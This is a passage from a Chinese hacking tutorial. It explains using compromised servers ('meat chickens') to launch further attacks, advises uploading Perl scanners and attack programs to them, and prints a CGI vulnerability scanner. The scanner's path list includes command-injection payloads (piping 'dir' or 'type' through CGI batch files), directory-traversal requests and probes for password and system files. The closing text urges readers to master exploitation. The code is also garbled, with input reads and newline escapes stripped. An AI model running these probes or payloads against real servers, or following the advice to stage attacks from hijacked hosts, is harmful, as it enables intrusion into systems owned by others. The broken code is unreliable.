第六章 工具的编写:第四节、Perl程序
很多黑客教程里面都有“肉鸡”的名词,究竟这是指什么呢?这是指具有利用价值的系统,例如当黑客使用的系统System经过攻击掌握了一台叫做Clink的系统之后,这台被控制的Clink就称作“肉鸡”,黑客可以直接在它上面对其他系统继续攻击。Clink如果具有Perl程序解释权限,那么对黑客来说就具备了基本的利用价值,因为Perl可以编写出很多具有攻击力的程序,在服务器Clink上运行这些程序显而易见要比在System上运行快的多、也安全的多。
在http://www.hack-net.com/上可以找到很多利用Perl编写的扫描器、攻击程序,将这些程序上传到具有Perl权限的服务器上,然后修改文件的属性数值为可执行,之后通过浏览器直接访问就可以完成相应的操作了。
本书前面在编写电子邮件炸弹的时候,简单的介绍过这种程序,现在我们再看看如何使用Perl编写漏洞扫描软件:
#! /usr/bin/perl
# ============================================================================
# CGI 漏洞扫描软件
# ============================================================================
use Socket;
$version = "Cgi Scanner v1.0";
%exploits = ( "VTI PVT [service.pwd]" => "/_vti_pvt/service.pwd",
"VTI PVT [administrators.pwd]" => "/_vti_pvt/administrators.pwd",
"VTI BIN [shtml.exe]" => "/_vti_bin/shtml.exe",
"un1g1.1" => "/cgi-bin/unlg1.1",
"gH.cgi" => "/cgi-bin/gH.cgi",
"nph-test-cgi(Bugtraq ID 686)" => "/cgi-bin/nph-test-cgi",
"nph-publish" => "/cgi-bin/nph-publish",
"Handler(Bugtraq ID 380)" => "/cgi-bin/handler",
"Webdist.cgi(Bugtraq ID 374)" => "/cgi-bin/webdist.cgi",
"faxsurvey" => "/cgi-bin/faxsurvey",
"wwwboard.cgi" => "/cgi-bin/wwwboard.cgi",
"campas" => "/cgi-bin/campas",
"AT-admin.cgi" => "/cgi-bin/AT-admin.cgi",
"filemail.pl" => "/cgi-bin/filemail.pl",
"info2www" => "/cgi-bin/info2www",
"files.pl" => "/cgi-bin/files.pl",
"Finger" => "/cgi-bin/finger",
"classifieds.cgi" => "/cgi-bin/classifieds.cgi",
"environ.cgi" => "/cgi-bin/environ.cgi",
"Webbbs.cgi(Bugtraq ID 803)" => "/cgi-bin/webbbs.cgi",
"whois_raw.cgi(Bugtraq ID 304)" => "/cgi-bin/whois_raw.cgi",
"Anyboard.cgi" => "/cgi-bin/AnyBoard.cgi",
"/scripts/issadmin/bdir.htr" => "/scripts/issadmin/bdir.htr",
"Msadc" => "/msadc/Samples/SELECTOR/showcode.asp",
"/iisadmpwd/aexp2.htr" => "/iisadmpwd/aexp2.htr",
"/iisadmpwd/anot3.htr" => "/iisadmpwd/anot3.htr",
"5daydatacopier.cgi" => "/cgi-bin/day5datacopier.cgi",
"passwd.txt" => "/cgi-bin/passwd.txt",
"password" => "/cgi-bin/password",
"/etc/group" => "/etc/group",
"/~root" => "/~root",
"Upload.pl" => "/cgi-bin/upload.pl",
"formmail.pl" => "/cgi-bin/formmail.pl",
"sendform.cgi" => "/cgi-bin/sendform.cgi",
"_AuthChangeUrl" => "/cgi-bin/_AuthChangeUrl",
"No-such-file.pl" => "/scripts/no-such-file.pl",
"/……" => "/……/",
"To long!" => "/.html/…………./config.sys",
"/_vti_pvt/shtml.exe" => "/_vti_pvt/shtml.exe",
"/_vti_inf.html" => "/_vti_inf.html",
"cgi-shl/win-c-sample.exe" => "/cgi-shl/win-c-sample.exe",
"default.asp" => "/default.asp",
"Server%20logfile" => "/server%20logfile",
"dcmcfg.nsf" => "/domcfg.nsf/?open",
"Webhits.exe" => "/scripts/samples/search/webhits.exe",
"fpexplore.exe" => "/cgi-bin/fpexplore.exe",
"gueryhit.htm" => "/samples/search/queryhit.htm",
"ss.cfg" => "/ss.cfg",
"visadmin.exe" => "/cgi-bin/visadmin.exe?user=guest",
"input.bat(Bugtraq ID 762)" => "/cgi-bin/input.bat?|dir….windows",
"indes.asl::$DATA" => "/index.asp::$DATA",
"//../../config.sys" => "//../../config.sys",
"/../../config.sys" => "/../../config.sys",
"main.asp%81" => "/main.asp%81",
"/adsamples/config/site.csc" => "/adsamples/config/site.csc",
"isn.dll" => "/scripts/iisadmin/ism.dll?http/dir",
"Search.cgi(Bugtraq ID 921)" => "/cgi-bin/search.cgi",
"bb-hist.sh(Bugtraq ID 142)" => "/cgi-bin/bb-hist.sh",
"kcms_configure(Bugtraq ID 452)" => "/usr/openwin/bin/kcms_configure",
"Bugtraq ID 162" => "/cgi-bin/s97_cgi s97r_cgi tasmgr",
"ppdscgi.exe(Bugtraq ID 491)" => "/cgi-bin/ppdscgi.exe",
"dfire.cgi(Bugtraq ID 564)" => "/cgi-bin/dfire.cgi",
"guestbook.pl(Bugtraq ID 776)" => "/cgi-bin/guestbook.pl",
"Anyform.cgi(Bugtraq ID 719)" => "/cgi-bin/AnyForm.cgi",
"w3-msql(Bugtraq ID 591, 898)" => "/cgi-bin/w3-msql",
"Bugtraq ID 770" => "/cgi-bin/tst.bat|type%20c:file.txt",
"Bugtraq ID 770" => "/cgi-bin/alibaba.pl|dir",
"Bugtraq ID 770" => "/cgi-bin/tst.bat|type%20c:file.txt",
"status.cgi(Bugtraq ID 914)" => "/cgi-bin/status.cgi",
"FormHandler 1.0, 2.0(Bugtraq ID 799, 798)" => "/cgi-bin/FormHandler.cgi",
"webwho.pl(Bugtraq ID 892)" => "/cgi-bin/webwho.pl",
"carbo.dll" => "/carbo.dll" );
&menu();
sub menu() {
print "nn";
print " $versionnn";
print " Based on source code of [ Infinity Scanner v1.3 ]nn";
print " 1) Cgi Sonarn";
print " 2) About Cgi Sonarn";
print " 3) Exploit Infon";
print " 4) Helpn";
print " 5) Exitn";
print "Command: ";
chop($selection=);
if($selection == "1") { &cgiscanner() }
if($selection == "2") { &infomessage() }
if($selection == "3") { &exploitinfo() }
if($selection == "4") { &helpmessage() }
if($selection == "5") { &exitcgisonar() }
else { &menu() }
}
sub cgiscanner() {
if($usehostlist eq "yes") { &exploituselist(); }
else { &exploitnouselist(); }
}
sub exploituselist() {
print "nServerlist Filename: ";
chop($hostlist=);
open(INF,"$hostlist") or &dienice("Can’t open $hostlist");
@hostsarray = ;
close(INF);
print "nEnable Logging?(Saved as gotcha.log) [yes or no]: ";
chop($storelogs=);
foreach $host (@hostsarray) {
chop($host)
&cgiscannerloop("$host");
}
&menu();
}
sub exploitnouselist() {
print "nHost: ";
chop($host=);
print "nEmable Logging?(Saved as gotcha.log) [yes or no]: ";
chop($storelogs=);
&cgiscannerloop("$host");
&menu();
}
sub cgiscannerloop() {
$host = "@_";
$serverIP = inet_aton($host);
$serverAddr = sockaddr_in(80, $serverIP);
$number = 0;
print "nnChecking $host for known exploits:nn";
foreach $key (keys %exploits) {
socket(CLIENT, PF_INET, SOCK_STREAM, getprotobyname(‘tcp’));
gethostbyname($host) or print "Ack! No Ip Address was enteredn";
if(!gethostbyname($host)) { print "Can’t Resolve host!n"; }
else {
if(connect(CLIENT, $serverAddr)) {
send(CLIENT,"GET $exploits{$key} HTTP/1.0nn",0);
$check=;
($http,$code,$therest) = split(/ /,$check);
if($code == 200) {
print "Exploit Found: $keynLocation: $exploits{$key}nn";
$number++;
if($storelogs eq "yes") {
open(GOTCHA, ">>gotcha.log") or &dienice("Couldn’t open
gotcha.log for writing. Please make sure the file exists and is
writable.n"); print GOTCHA "Exploit Found: $keynServer:
$hostnLocation: $exploits{$key}nn"; close(GOTCHA); }
}
else { if($verbosemode eq "y") { print "$key Exploits Not Foundn"; } }
}
close (CLIENT);
}
}
if($number == 0) { print "No exploitable holes found on host $hostn"; }
}
sub infomessage() {
print" Cgi Scanner v1.0 by Maxviewnn";
chop($uselessvariable=);
}
sub exploitinfo() {
print" Exploit Infonn";
print" If you are having trouble finding info on the exploits foundn";
print" on a certain host you have scanned… I strongly suggest you n";
print" look for info on the exploits found on a host at the followingn";
print" sites… http://www.securityfocus.com, www.rootshell.com, orn";
print" http://packetstorm.securify.com… If you are confused aboutn";
print" the Bugtraq ID’s… Then simply go to http://www.securityfocus.comn";
print" /level2/bottom.html?go=vulnerabilities and click on the Bugtraq IDn";
print" tab and type in the ID number in the blank box… All the infon";
print" you will need will be in the newly loaded page…nn";
print "Press enter to continue…";
chop($uselessvariable=); }
sub helpmessage() {
print" Helpnn";
print" Cgi Scanner command’snn";
print" 1) Cgi Scanner- Scans for known Cgi exploits on a remote host…n";
print" 2) About Cgi Scanner- Informs you about Cgi Scanner…n";
print" 3) Help- Informs you on certain aspects of Cgi Scanner…n";
print" 4) Exit- It simply exits you out of the Cgi Scanner…nn";
print" Sub command’snn";
print" Host:- Allows you to type in the IP of the host you wishn";
print" to scan (e.g. 127.0.0.1)…n";
print" Enable Logging- Logs exploits found, Host IP, etc…n";
print" Thank you for using Cgi Scannernn";
print "Press enter to continue…";
chop($uselessvariable=);
}
sub exitcgisonar() { exit 1; }
程序看上去很复杂,但实际上和C语言编写的漏洞扫描其原理是一样的,都是先通过Socket与服务器建立连接,然后发送Get请求查询指定的文件是否存在,如果存在则报告文件的位置。这个程序中定义了很多种不同的漏洞,作为学习者应该努力掌握这些漏洞的原理和利用方法。
2008/01/20 19:34:12
………………………